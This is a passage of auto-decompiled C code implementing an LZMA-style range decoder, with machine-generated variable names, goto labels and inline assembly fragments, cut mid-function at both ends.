							_t890 = _t890 << 0x00000008 |  *_t1316 & 0x000000ff;
							_t1316 =  &(_t1316[1]);
							 *(_t1381 + 0x10) = _t1316;
						}
						_t988 = (_t511 >> 0xb) * _t1263;
						if(_t890 >= _t988) {
							_t512 = _t511 - _t988;
							_t890 = _t890 - _t988;
							 *(_t559 + _t777) = _t1263 - (_t1263 >> 5);
							_t559 = _t559 + 1;
						} else {
							_t512 = _t988;
							 *(_t559 + _t777) = (0x800 - _t1263 >> 5) + _t1263;
						}
						_t1265 = _t559 + _t559;
						_t991 =  *(_t1265 + _t777) & 0x0000ffff;
						if(_t512 < 0x1000000) {
							_t512 = _t512 << 8;
							_t890 = _t890 << 0x00000008 |  *_t1316 & 0x000000ff;
							 *(_t1381 + 0x10) =  &(_t1316[1]);
						}
						_t562 = (_t512 >> 0xb) * _t991;
						if(_t890 >= _t562) {
							_t502 = _t512 - _t562;
							_t890 = _t890 - _t562;
							 *(_t1265 + _t777) = _t991 - (_t991 >> 5);
							_t1265 = _t1265 + 1;
						} else {
							_t502 = _t562;
							 *(_t1265 + _t777) = (0x800 - _t991 >> 5) + _t991;
						}
						_t1246 = _t1265 - 0x40;
						if(_t1246 < 4) {
							L228:
							 *(_t1381 + 0x48) =  *(_t1381 + 0x40);
							 *(_t1381 + 0x40) =  *(_t1381 + 0x3c);
							 *(_t1381 + 0x3c) =  *(_t1381 + 0x2c);
							_t436 = _t1246 + 1; // -61
							_t781 = _t436;
							 *(_t1381 + 0x2c) = _t781;
							asm("sbb ecx, ecx");
							 *(_t1381 + 0x14) = (_t781 & 0xfffffffd) + 0xa;
							_t784 =  *(_t1381 + 0x4c);
							if(_t784 == 0) {
								_t784 =  *(_t1381 + 0x28);
							}
							if(_t1246 >= _t784) {
								 *( *((intOrPtr*)(_t1381 + 0x60)) + 0x18) =  *(_t1381 + 0x1c);
								return 1;
							} else {
								goto L231;
							}
						} else {
							_t787 = (_t1246 >> 1) - 1;
							_t1268 = _t1246 & 0x00000001 | 0x00000002;
							if(_t1246 >= 0xe) {
								_t1318 =  *(_t1381 + 0x10);
								_t788 = _t787 - 4;
								do {
									if(_t502 < 0x1000000) {
										_t502 = _t502 << 8;
										_t890 = _t890 << 0x00000008 |  *_t1318 & 0x000000ff;
										_t1318 =  &(_t1318[1]);
									}
									_t502 = _t502 >> 1;
									_t903 = _t890 - _t502;
									_t997 =  ~(_t903 >> 0x1f);
									_t1268 = _t997 + 1 + _t1268 * 2;
									_t890 = _t903 + (_t997 & _t502);
									_t788 = _t788 - 1;
								} while (_t788 != 0);
								_t1000 =  *(_t1381 + 0x44);
								_t789 =  *(_t1000 + 2) & 0x0000ffff;
								_t1269 = _t1268 << 4;
								 *(_t1381 + 0x10) = _t1318;
								if(_t502 < 0x1000000) {
									_t502 = _t502 << 8;
									_t890 = _t890 << 0x00000008 |  *_t1318 & 0x000000ff;
									_t1318 =  &(_t1318[1]);
									 *(_t1381 + 0x10) = _t1318;
								}
								_t568 = (_t502 >> 0xb) * _t789;
								if(_t890 >= _t568) {
									_t515 = _t502 - _t568;
                                                                                                                                                      									_t890 = _t890 - _t568;
                                                                                                                                                      									 *(_t1000 + 2) = _t789 - (_t789 >> 5);
                                                                                                                                                      									_t791 = 3;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t515 = _t568;
                                                                                                                                                      									 *(_t1000 + 2) = (0x800 - _t789 >> 5) + _t789;
                                                                                                                                                      									_t791 = 2;
                                                                                                                                                      								}
                                                                                                                                                      								_t571 =  *(_t1000 + _t791 * 2) & 0x0000ffff;
                                                                                                                                                      								if(_t515 < 0x1000000) {
                                                                                                                                                      									_t515 = _t515 << 8;
                                                                                                                                                      									_t890 = _t890 << 0x00000008 |  *_t1318 & 0x000000ff;
                                                                                                                                                      									 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
                                                                                                                                                      								}
                                                                                                                                                      								_t1321 = (_t515 >> 0xb) * _t571;
                                                                                                                                                      								if(_t890 >= _t1321) {
                                                                                                                                                      									_t516 = _t515 - _t1321;
                                                                                                                                                      									_t890 = _t890 - _t1321;
                                                                                                                                                      									 *(_t1000 + _t791 * 2) = _t571 - (_t571 >> 5);
                                                                                                                                                      									_t792 = _t791 + 4;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t516 = _t1321;
                                                                                                                                                      									 *(_t1000 + _t791 * 2) = (0x800 - _t571 >> 5) + _t571;
                                                                                                                                                      									_t792 = _t791 + 2;
                                                                                                                                                      								}
                                                                                                                                                      								_t573 =  *(_t1000 + _t792 * 2) & 0x0000ffff;
                                                                                                                                                      								if(_t516 < 0x1000000) {
                                                                                                                                                      									_t516 = _t516 << 8;
                                                                                                                                                      									_t890 = _t890 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
                                                                                                                                                      									 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
                                                                                                                                                      								}
                                                                                                                                                      								_t1326 = (_t516 >> 0xb) * _t573;
                                                                                                                                                      								if(_t890 >= _t1326) {
                                                                                                                                                      									_t517 = _t516 - _t1326;
                                                                                                                                                      									_t890 = _t890 - _t1326;
                                                                                                                                                      									 *(_t1000 + _t792 * 2) = _t573 - (_t573 >> 5);
                                                                                                                                                      									_t793 = _t792 + 8;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t517 = _t1326;
                                                                                                                                                      									 *(_t1000 + _t792 * 2) = (0x800 - _t573 >> 5) + _t573;
                                                                                                                                                      									_t793 = _t792 + 4;
                                                                                                                                                      								}
                                                                                                                                                      								_t575 =  *(_t1000 + _t793 * 2) & 0x0000ffff;
                                                                                                                                                      								if(_t517 < 0x1000000) {
                                                                                                                                                      									_t517 = _t517 << 8;
                                                                                                                                                      									_t890 = _t890 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
                                                                                                                                                      									 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
                                                                                                                                                      								}
                                                                                                                                                      								_t1331 = (_t517 >> 0xb) * _t575;
                                                                                                                                                      								if(_t890 >= _t1331) {
                                                                                                                                                      									_t502 = _t517 - _t1331;
                                                                                                                                                      									_t890 = _t890 - _t1331;
                                                                                                                                                      									 *(_t1000 + _t793 * 2) = _t575 - (_t575 >> 5);
                                                                                                                                                      								} else {
                                                                                                                                                      									_t502 = _t1331;
                                                                                                                                                      									 *(_t1000 + _t793 * 2) = (0x800 - _t575 >> 5) + _t575;
                                                                                                                                                      									_t793 = _t793 - 8;
                                                                                                                                                      								}
                                                                                                                                                      								_t1246 = _t1269 | _t793;
                                                                                                                                                      								if(_t1246 == 0xffffffff) {
                                                                                                                                                      									 *(_t1381 + 0x14) =  *(_t1381 + 0x14) - 0xc;
                                                                                                                                                      									_t1251 = 0x112;
                                                                                                                                                      									L250:
                                                                                                                                                      									_t772 =  *((intOrPtr*)(_t1381 + 0x60));
                                                                                                                                                      									_t962 =  *(_t1381 + 0x10);
                                                                                                                                                      									if(_t502 < 0x1000000) {
                                                                                                                                                      										_t502 = _t502 << 8;
                                                                                                                                                      										_t890 = _t890 << 0x00000008 |  *_t962 & 0x000000ff;
                                                                                                                                                      										_t962 =  &(_t962[1]);
                                                                                                                                                      									}
                                                                                                                                                      									 *(_t772 + 0x24) = _t890;
                                                                                                                                                      									 *(_t772 + 0x20) = _t502;
                                                                                                                                                      									 *(_t772 + 0x18) =  *(_t1381 + 0x1c);
                                                                                                                                                      									 *(_t772 + 0x28) =  *(_t1381 + 0x28);
                                                                                                                                                      									 *(_t772 + 0x1c) = _t962;
                                                                                                                                                      									 *(_t772 + 0x30) =  *(_t1381 + 0x2c);
                                                                                                                                                      									 *(_t772 + 0x44) = _t1251;
                                                                                                                                                      									 *(_t772 + 0x34) =  *(_t1381 + 0x3c);
                                                                                                                                                      									 *(_t772 + 0x38) =  *(_t1381 + 0x3c);
                                                                                                                                                      									 *(_t772 + 0x3c) =  *(_t1381 + 0x44);
                                                                                                                                                      									 *((intOrPtr*)(_t772 + 0x40)) =  *((intOrPtr*)(_t1381 + 0xc));
                                                                                                                                                      									return 0;
                                                                                                                                                      								} else {
                                                                                                                                                      									goto L228;
                                                                                                                                                      								}
                                                                                                                                                      							} else {
                                                                                                                                                      								_t1351 = 1;
                                                                                                                                                      								_t1271 = (_t1268 << _t787) + 1;
                                                                                                                                                      								do {
                                                                                                                                                      									_t1002 =  *( *(_t1381 + 0x44) + _t1271 * 2 - 0xd00) & 0x0000ffff;
                                                                                                                                                      									if(_t502 < 0x1000000) {
                                                                                                                                                      										_t502 = _t502 << 8;
                                                                                                                                                      										_t890 = _t890 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
                                                                                                                                                      										 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
                                                                                                                                                      									}
                                                                                                                                                      									_t584 = (_t502 >> 0xb) * _t1002;
                                                                                                                                                      									if(_t890 >= _t584) {
                                                                                                                                                      										_t502 = _t502 - _t584;
                                                                                                                                                      										_t890 = _t890 - _t584;
                                                                                                                                                      										_t1351 = _t1351 + _t1351;
                                                                                                                                                      										 *( *(_t1381 + 0x44) + _t1271 * 2 - 0xd00) = _t1002 - (_t1002 >> 5);
                                                                                                                                                      										_t1271 = _t1271 + _t1351;
                                                                                                                                                      									} else {
                                                                                                                                                      										_t502 = _t584;
                                                                                                                                                      										 *( *(_t1381 + 0x44) + _t1271 * 2 - 0xd00) = (0x800 - _t1002 >> 5) + _t1002;
                                                                                                                                                      										_t1271 = _t1271 + _t1351;
                                                                                                                                                      										_t1351 = _t1351 + _t1351;
                                                                                                                                                      									}
                                                                                                                                                      									_t787 = _t787 - 1;
                                                                                                                                                      								} while (_t787 != 0);
                                                                                                                                                      								_t1246 = _t1271 - _t1351;
                                                                                                                                                      								goto L228;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						L253:
                                                                                                                                                      						L231:
                                                                                                                                                      						_t960 =  *(_t1381 + 0x1c);
                                                                                                                                                      						_t546 =  *(_t1381 + 0x30) + 2;
                                                                                                                                                      						_t769 =  *((intOrPtr*)(_t1381 + 0x64)) - _t960;
                                                                                                                                                      						if(_t769 == 0) {
                                                                                                                                                      							 *( *((intOrPtr*)(_t1381 + 0x60)) + 0x18) = _t960;
                                                                                                                                                      							return 1;
                                                                                                                                                      						} else {
                                                                                                                                                      							if(_t769 >= _t546) {
                                                                                                                                                      								_t769 = _t546;
                                                                                                                                                      							}
                                                                                                                                                      							asm("sbb esi, esi");
                                                                                                                                                      							 *(_t1381 + 0x28) =  *(_t1381 + 0x28) + _t769;
                                                                                                                                                      							 *(_t1381 + 0x30) = _t546 - _t769;
                                                                                                                                                      							_t1250 = (_t1246 &  *(_t1381 + 0x38)) -  *(_t1381 + 0x2c) + _t960;
                                                                                                                                                      							if(_t769 >  *(_t1381 + 0x38) - _t1250) {
                                                                                                                                                      								_t1313 =  *((intOrPtr*)(_t1381 + 0x34));
                                                                                                                                                      								do {
                                                                                                                                                      									 *((char*)(_t960 + _t1313)) =  *((intOrPtr*)(_t1250 + _t1313));
                                                                                                                                                      									_t1250 = _t1250 + 1;
                                                                                                                                                      									_t960 = _t960 + 1;
                                                                                                                                                      									if(_t1250 ==  *(_t1381 + 0x38)) {
                                                                                                                                                      										_t1250 = 0;
                                                                                                                                                      									}
                                                                                                                                                      									_t769 = _t769 - 1;
                                                                                                                                                      								} while (_t769 != 0);
                                                                                                                                                      								 *(_t1381 + 0x1c) = _t960;
                                                                                                                                                      							} else {
                                                                                                                                                      								_t1315 = _t960 +  *((intOrPtr*)(_t1381 + 0x34));
                                                                                                                                                      								_t1253 = _t1250 - _t960;
                                                                                                                                                      								_t555 = _t769 + _t1315;
                                                                                                                                                      								 *(_t1381 + 0x1c) = _t960 + _t769;
                                                                                                                                                      								do {
                                                                                                                                                      									 *_t1315 =  *((intOrPtr*)(_t1253 + _t1315));
                                                                                                                                                      									_t1315 = _t1315 + 1;
                                                                                                                                                      								} while (_t1315 != _t555);
                                                                                                                                                      								L243:
                                                                                                                                                      								while( *(_t1381 + 0x1c) <  *((intOrPtr*)(_t1381 + 0x64)) &&  *(_t1381 + 0x10) <  *((intOrPtr*)(_t1381 + 0x68))) {
                                                                                                                                                      									_t1223 =  *(_t1381 + 0x58);
                                                                                                                                                      									_t1311 =  *(_t1381 + 0x44);
                                                                                                                                                      									_t542 = ( *(_t1381 + 0x28) & _t1223) << 4;
                                                                                                                                                      									 *(_t1381 + 0x24) = _t542;
                                                                                                                                                      									_t543 = _t542 +  *(_t1381 + 0x14);
                                                                                                                                                      									_t737 =  *(_t1311 + _t543 * 2 - 0x200) & 0x0000ffff;
                                                                                                                                                      									if(_t495 < 0x1000000) {
                                                                                                                                                      										_t1309 =  *(_t1381 + 0x10);
                                                                                                                                                      										_t495 = _t495 << 8;
                                                                                                                                                      										_t890 = _t890 << 0x00000008 |  *_t1309 & 0x000000ff;
                                                                                                                                                      										 *(_t1381 + 0x10) =  &(_t1309[1]);
                                                                                                                                                      									}
                                                                                                                                                      									_t947 = (_t495 >> 0xb) * _t737;
                                                                                                                                                      									if(_t890 >= _t947) {
                                                                                                                                                      										 *(_t1311 + _t543 * 2 - 0x200) = _t737 - (_t737 >> 5);
                                                                                                                                                      										_t740 =  *(_t1311 + 0x20 +  *(_t1381 + 0x14) * 2) & 0x0000ffff;
                                                                                                                                                      										_t496 = _t495 - _t947;
                                                                                                                                                      										_t891 = _t890 - _t947;
                                                                                                                                                      										if(_t496 < 0x1000000) {
                                                                                                                                                      											_t1293 =  *(_t1381 + 0x10);
                                                                                                                                                      											_t496 = _t496 << 8;
                                                                                                                                                      											_t891 = _t891 << 0x00000008 |  *_t1293 & 0x000000ff;
                                                                                                                                                      											 *(_t1381 + 0x10) =  &(_t1293[1]);
                                                                                                                                                      										}
                                                                                                                                                      										_t1228 = (_t496 >> 0xb) * _t740;
                                                                                                                                                      										if(_t891 >= _t1228) {
                                                                                                                                                      											_t948 =  *(_t1381 + 0x14);
                                                                                                                                                      											_t497 = _t496 - _t1228;
                                                                                                                                                      											_t890 = _t891 - _t1228;
                                                                                                                                                      											 *((short*)(_t1311 + 0x20 + _t948 * 2)) = _t740 - (_t740 >> 5);
                                                                                                                                                      											_t1231 =  *(_t1311 + 0x38 + _t948 * 2) & 0x0000ffff;
                                                                                                                                                      											if(_t497 < 0x1000000) {
                                                                                                                                                      												_t497 = _t497 << 8;
                                                                                                                                                      												_t890 = _t890 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
                                                                                                                                                      												 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
                                                                                                                                                      											}
                                                                                                                                                      											_t744 = (_t497 >> 0xb) * _t1231;
                                                                                                                                                      											if(_t890 >= _t744) {
                                                                                                                                                      												_t498 = _t497 - _t744;
                                                                                                                                                      												_t892 = _t890 - _t744;
                                                                                                                                                      												 *(_t1311 + 0x38 + _t948 * 2) = _t1231 - (_t1231 >> 5);
                                                                                                                                                      												_t747 =  *(_t1311 + 0x50 + _t948 * 2) & 0x0000ffff;
                                                                                                                                                      												if(_t498 < 0x1000000) {
                                                                                                                                                      													_t1282 =  *(_t1381 + 0x10);
                                                                                                                                                      													_t498 = _t498 << 8;
                                                                                                                                                      													_t892 = _t892 << 0x00000008 |  *_t1282 & 0x000000ff;
                                                                                                                                                      													 *(_t1381 + 0x10) =  &(_t1282[1]);
                                                                                                                                                      												}
                                                                                                                                                      												_t1235 = (_t498 >> 0xb) * _t747;
                                                                                                                                                      												if(_t892 >= _t1235) {
                                                                                                                                                      													_t499 = _t498 - _t1235;
                                                                                                                                                      													_t893 = _t892 - _t1235;
                                                                                                                                                      													 *(_t1311 + 0x50 + _t948 * 2) = _t747 - (_t747 >> 5);
                                                                                                                                                      													_t749 =  *(_t1311 + 0x68 + _t948 * 2) & 0x0000ffff;
                                                                                                                                                      													if(_t499 < 0x1000000) {
                                                                                                                                                      														_t1276 =  *(_t1381 + 0x10);
                                                                                                                                                      														_t499 = _t499 << 8;
                                                                                                                                                      														_t893 = _t893 << 0x00000008 |  *_t1276 & 0x000000ff;
                                                                                                                                                      														 *(_t1381 + 0x10) =  &(_t1276[1]);
                                                                                                                                                      													}
                                                                                                                                                      													_t1240 = (_t499 >> 0xb) * _t749;
                                                                                                                                                      													if(_t893 >= _t1240) {
                                                                                                                                                      														_t500 = _t499 - _t1240;
                                                                                                                                                      														_t893 = _t893 - _t1240;
                                                                                                                                                      														 *(_t1311 + 0x68 + _t948 * 2) = _t749 - (_t749 >> 5);
                                                                                                                                                      														_t751 =  *(_t1381 + 0x48);
                                                                                                                                                      														 *(_t1381 + 0x48) =  *(_t1381 + 0x40);
                                                                                                                                                      													} else {
                                                                                                                                                      														_t500 = _t1240;
                                                                                                                                                      														_t751 =  *(_t1381 + 0x40);
                                                                                                                                                      														 *(_t1311 + 0x68 + _t948 * 2) = (0x800 - _t749 >> 5) + _t749;
                                                                                                                                                      													}
                                                                                                                                                      													 *(_t1381 + 0x40) =  *(_t1381 + 0x3c);
                                                                                                                                                      												} else {
                                                                                                                                                      													_t500 = _t1235;
                                                                                                                                                      													_t751 =  *(_t1381 + 0x3c);
                                                                                                                                                      													 *(_t1311 + 0x50 + _t948 * 2) = (0x800 - _t747 >> 5) + _t747;
                                                                                                                                                      												}
                                                                                                                                                      												 *(_t1381 + 0x3c) =  *(_t1381 + 0x2c);
                                                                                                                                                      												 *(_t1381 + 0x2c) = _t751;
                                                                                                                                                      												goto L115;
                                                                                                                                                      											} else {
                                                                                                                                                      												_t948 =  *(_t1381 + 0x14);
                                                                                                                                                      												 *((short*)(_t1311 + 0x38 +  *(_t1381 + 0x14) * 2)) = (0x800 - _t1231 >> 5) + _t1231;
                                                                                                                                                      												_t1285 =  *(_t1311 + _t543 * 2 - 0xc00) & 0x0000ffff;
                                                                                                                                                      												_t524 = _t744;
                                                                                                                                                      												if(_t744 < 0x1000000) {
                                                                                                                                                      													_t524 = _t744 << 8;
                                                                                                                                                      													_t890 = _t890 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
                                                                                                                                                      													 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
                                                                                                                                                      												}
                                                                                                                                                      												_t832 = (_t524 >> 0xb) * _t1285;
                                                                                                                                                      												if(_t890 >= _t832) {
                                                                                                                                                      													_t500 = _t524 - _t832;
                                                                                                                                                      													_t893 = _t890 - _t832;
                                                                                                                                                      													_t751 = _t1285 >> 5;
                                                                                                                                                      													 *(_t1311 + _t543 * 2 - 0xc00) = _t1285 - _t751;
                                                                                                                                                      													L115:
                                                                                                                                                      													asm("sbb ecx, ecx");
                                                                                                                                                      													_t753 = (_t751 & 0xfffffffd) + 0xb;
                                                                                                                                                      													_t1246 = _t1311 - 0xa00;
                                                                                                                                                      													goto L116;
                                                                                                                                                      												} else {
                                                                                                                                                      													_t502 = _t832;
                                                                                                                                                      													_t1287 =  *(_t1381 + 0x1c);
                                                                                                                                                      													 *(_t1311 + _t543 * 2 - 0xc00) = (0x800 - _t1285 >> 5) + _t1285;
                                                                                                                                                      													_t1353 =  *((intOrPtr*)(_t1381 + 0x34));
                                                                                                                                                      													asm("sbb ebx, ebx");
                                                                                                                                                      													 *(_t1381 + 0x28) =  *(_t1381 + 0x28) + 1;
                                                                                                                                                      													_t839 =  *((_t543 &  *(_t1381 + 0x38)) -  *(_t1381 + 0x2c) + _t1287 + _t1353) & 0x000000ff;
                                                                                                                                                      													 *(_t1287 + _t1353) = _t839;
                                                                                                                                                      													asm("sbb ecx, ecx");
                                                                                                                                                      													 *(_t1381 + 0x1c) = _t1287 + 1;
                                                                                                                                                      													 *(_t1381 + 0x14) = (_t839 & 0xfffffffe) + 0xb;
                                                                                                                                                      													continue;
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      										} else {
                                                                                                                                                      											_t500 = _t1228;
                                                                                                                                                      											_t847 =  *(_t1381 + 0x14);
                                                                                                                                                      											 *((short*)(_t1311 + 0x20 + _t847 * 2)) = (0x800 - _t740 >> 5) + _t740;
                                                                                                                                                      											_t753 = _t847 + 0xc;
                                                                                                                                                      											_t1246 = _t1311 - 0x600;
                                                                                                                                                      											L116:
                                                                                                                                                      											_t949 =  *_t1246 & 0x0000ffff;
                                                                                                                                                      											 *(_t1381 + 0x14) = _t753;
                                                                                                                                                      											if(_t500 < 0x1000000) {
                                                                                                                                                      												_t828 =  *(_t1381 + 0x10);
                                                                                                                                                      												_t500 = _t500 << 8;
                                                                                                                                                      												_t893 = _t893 << 0x00000008 |  *_t828 & 0x000000ff;
                                                                                                                                                      												 *(_t1381 + 0x10) =  &(_t828[1]);
                                                                                                                                                      											}
                                                                                                                                                      											_t756 = (_t500 >> 0xb) * _t949;
                                                                                                                                                      											if(_t893 >= _t756) {
                                                                                                                                                      												_t501 = _t500 - _t756;
                                                                                                                                                      												_t894 = _t893 - _t756;
                                                                                                                                                      												 *_t1246 = _t949 - (_t949 >> 5);
                                                                                                                                                      												_t951 =  *(_t1246 + 0x10) & 0x0000ffff;
                                                                                                                                                      												if(_t501 < 0x1000000) {
                                                                                                                                                      													_t809 =  *(_t1381 + 0x10);
                                                                                                                                                      													_t501 = _t501 << 8;
                                                                                                                                                      													_t894 = _t894 << 0x00000008 |  *_t809 & 0x000000ff;
                                                                                                                                                      													 *(_t1381 + 0x10) =  &(_t809[1]);
                                                                                                                                                      												}
                                                                                                                                                      												_t761 = (_t501 >> 0xb) * _t951;
                                                                                                                                                      												if(_t894 >= _t761) {
                                                                                                                                                      													_t502 = _t501 - _t761;
                                                                                                                                                      													_t890 = _t894 - _t761;
                                                                                                                                                      													 *(_t1246 + 0x10) = _t951 - (_t951 >> 5);
                                                                                                                                                      													_t764 = 1;
                                                                                                                                                      													do {
                                                                                                                                                      														goto L153;
                                                                                                                                                      													} while (_t764 < 0x100);
                                                                                                                                                      													goto L159;
                                                                                                                                                      												} else {
                                                                                                                                                      													 *(_t1246 + 0x10) = (0x800 - _t951 >> 5) + _t951;
                                                                                                                                                      													_t1246 = _t1246 + 0x10 +  *(_t1381 + 0x24) * 2;
                                                                                                                                                      													_t1036 =  *(_t1246 + 2) & 0x0000ffff;
                                                                                                                                                      													_t518 = _t761;
                                                                                                                                                      													if(_t761 < 0x1000000) {
                                                                                                                                                      														_t518 = _t761 << 8;
                                                                                                                                                      														_t807 =  *(_t1381 + 0x10);
                                                                                                                                                      														_t894 = _t894 << 0x00000008 |  *_t807 & 0x000000ff;
                                                                                                                                                      														 *(_t1381 + 0x10) =  &(_t807[1]);
                                                                                                                                                      													}
                                                                                                                                                      													_t796 = (_t518 >> 0xb) * _t1036;
													if(_t894 >= _t796) {
														_t519 = _t518 - _t796;
														_t894 = _t894 - _t796;
														 *(_t1246 + 2) = _t1036 - (_t1036 >> 5);
														_t799 = 3;
													} else {
														_t519 = _t796;
														 *(_t1246 + 2) = (0x800 - _t1036 >> 5) + _t1036;
														_t799 = 2;
													}
													_t604 = _t799 + _t799;
													_t800 =  *(_t604 + _t1246) & 0x0000ffff;
													if(_t519 < 0x1000000) {
														_t519 = _t519 << 8;
														_t894 = _t894 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
														 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
													}
													_t1040 = (_t519 >> 0xb) * _t800;
													if(_t894 >= _t1040) {
														_t520 = _t519 - _t1040;
														_t890 = _t894 - _t1040;
														 *(_t604 + _t1246) = _t800 - (_t800 >> 5);
														_t604 = _t604 + 1;
													} else {
														_t520 = _t1040;
														 *(_t604 + _t1246) = (0x800 - _t800 >> 5) + _t800;
													}
													_t767 = _t604 + _t604;
													_t1043 =  *(_t767 + _t1246) & 0x0000ffff;
													if(_t520 < 0x1000000) {
														_t520 = _t520 << 8;
														_t890 = _t890 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
														 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
													}
													_t607 = (_t520 >> 0xb) * _t1043;
													if(_t890 >= _t607) {
														_t502 = _t520 - _t607;
														_t890 = _t890 - _t607;
														 *(_t767 + _t1246) = _t1043 - (_t1043 >> 5);
														_t767 = _t767 + 1;
													} else {
														_t502 = _t607;
														 *(_t767 + _t1246) = (0x800 - _t1043 >> 5) + _t1043;
													}
												}
											} else {
												 *_t1246 = (0x800 - _t949 >> 5) + _t949;
												_t1246 = _t1246 +  *(_t1381 + 0x24) * 2;
												_t1052 =  *(_t1246 + 2) & 0x0000ffff;
												_t521 = _t756;
												if(_t756 < 0x1000000) {
													_t521 = _t756 << 8;
													_t826 =  *(_t1381 + 0x10);
													_t893 = _t893 << 0x00000008 |  *_t826 & 0x000000ff;
													 *(_t1381 + 0x10) =  &(_t826[1]);
												}
												_t813 = (_t521 >> 0xb) * _t1052;
												if(_t893 >= _t813) {
													_t522 = _t521 - _t813;
													_t893 = _t893 - _t813;
													 *(_t1246 + 2) = _t1052 - (_t1052 >> 5);
													_t816 = 3;
												} else {
													_t522 = _t813;
													 *(_t1246 + 2) = (0x800 - _t1052 >> 5) + _t1052;
													_t816 = 2;
												}
												_t622 = _t816 + _t816;
												_t817 =  *(_t622 + _t1246) & 0x0000ffff;
												if(_t522 < 0x1000000) {
													_t522 = _t522 << 8;
													_t893 = _t893 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
													 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
												}
												_t1056 = (_t522 >> 0xb) * _t817;
												if(_t893 >= _t1056) {
													_t523 = _t522 - _t1056;
													_t890 = _t893 - _t1056;
													 *(_t622 + _t1246) = _t817 - (_t817 >> 5);
													_t622 = _t622 + 1;
												} else {
													_t523 = _t1056;
													 *(_t622 + _t1246) = (0x800 - _t817 >> 5) + _t817;
												}
												_t819 = _t622 + _t622;
												_t1059 =  *(_t819 + _t1246) & 0x0000ffff;
												if(_t523 < 0x1000000) {
													_t523 = _t523 << 8;
													_t890 = _t890 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
													 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
												}
												_t625 = (_t523 >> 0xb) * _t1059;
												if(_t890 >= _t625) {
													_t502 = _t523 - _t625;
													_t890 = _t890 - _t625;
													 *(_t819 + _t1246) = _t1059 - (_t1059 >> 5);
													_t767 = _t819 + 1 - 8;
												} else {
													_t502 = _t625;
													 *(_t819 + _t1246) = (0x800 - _t1059 >> 5) + _t1059;
													_t767 = _t819 - 8;
												}
												while(1) {
													 *(_t1381 + 0x30) = _t767;
													if( *(_t1381 + 0x14) < 0xc) {
														goto L231;
													}
													goto L161;
												}
											}
											 *(_t1381 + 0x30) = _t767;
											if( *(_t1381 + 0x14) < 0xc) {
												goto L231;
											}
										}
									} else {
										 *(_t1311 + _t543 * 2 - 0x200) = (0x800 - _t737 >> 5) + _t737;
										_t525 = _t947;
										_t1299 = _t1311 + 0x280;
										if( *(_t1381 + 0x28) != 0 ||  *(_t1381 + 0x4c) != 0) {
											_t848 =  *(_t1381 + 0x1c);
											if(_t848 == 0) {
												_t848 =  *(_t1381 + 0x38);
											}
											_t543 = (( *(_t848 +  *((intOrPtr*)(_t1381 + 0x34)) - 1) & 0x000000ff) + ( *(_t1381 + 0x28) << 0x00000008) &  *(_t1381 + 0x50)) <<  *(_t1381 + 0x54);
											_t1299 = _t1299 + (_t543 + _t543 * 2) * 2;
										}
										_t853 =  *(_t1381 + 0x14);
										 *(_t1381 + 0x28) =  *(_t1381 + 0x28) + 1;
										if(_t853 >= 7) {
											asm("sbb ebx, ebx");
											 *(_t1381 + 0x14) =  *(_t1381 + 0x14) - (_t543 & 0xfffffffd) + 6;
											asm("sbb ebp, ebp");
											_t1358 = ( *( *((intOrPtr*)(_t1381 + 0x34)) + (_t1311 &  *(_t1381 + 0x38)) -  *(_t1381 + 0x2c) +  *(_t1381 + 0x1c)) & 0x000000ff) + ( *( *((intOrPtr*)(_t1381 + 0x34)) + (_t1311 &  *(_t1381 + 0x38)) -  *(_t1381 + 0x2c) +  *(_t1381 + 0x1c)) & 0x000000ff);
											_t859 = _t1358 & 0x00000100;
											_t648 =  *(_t1299 + 0x202 + _t859 * 2) & 0x0000ffff;
											if(_t947 < 0x1000000) {
												_t525 = _t947 << 8;
												_t890 = _t890 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
												 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
											}
											_t1074 = (_t525 >> 0xb) * _t648;
											if(_t890 >= _t1074) {
												_t526 = _t525 - _t1074;
												_t890 = _t890 - _t1074;
												 *(_t1299 + 0x202 + _t859 * 2) = _t648 - (_t648 >> 5);
												_t650 = 3;
											} else {
												_t526 = _t1074;
												 *(_t1299 + 0x202 + _t859 * 2) = (0x800 - _t648 >> 5) + _t648;
												_t650 = 2;
												_t859 = _t859 ^ 0x00000100;
											}
											_t1359 = _t1358 + _t1358;
											_t1077 = _t859;
											 *(_t1381 + 0x20) = _t1077;
											_t860 = _t859 & _t1359;
											_t1080 = _t1299 + (_t1077 + _t860 + _t650) * 2;
											 *(_t1381 + 0x18) = _t1080;
											_t1081 =  *_t1080 & 0x0000ffff;
											 *(_t1381 + 0x24) = _t1359;
											if(_t526 < 0x1000000) {
												_t526 = _t526 << 8;
												_t890 = _t890 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
												 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
											}
											_t1362 = (_t526 >> 0xb) * _t1081;
											if(_t890 >= _t1362) {
												_t527 = _t526 - _t1362;
												_t890 = _t890 - _t1362;
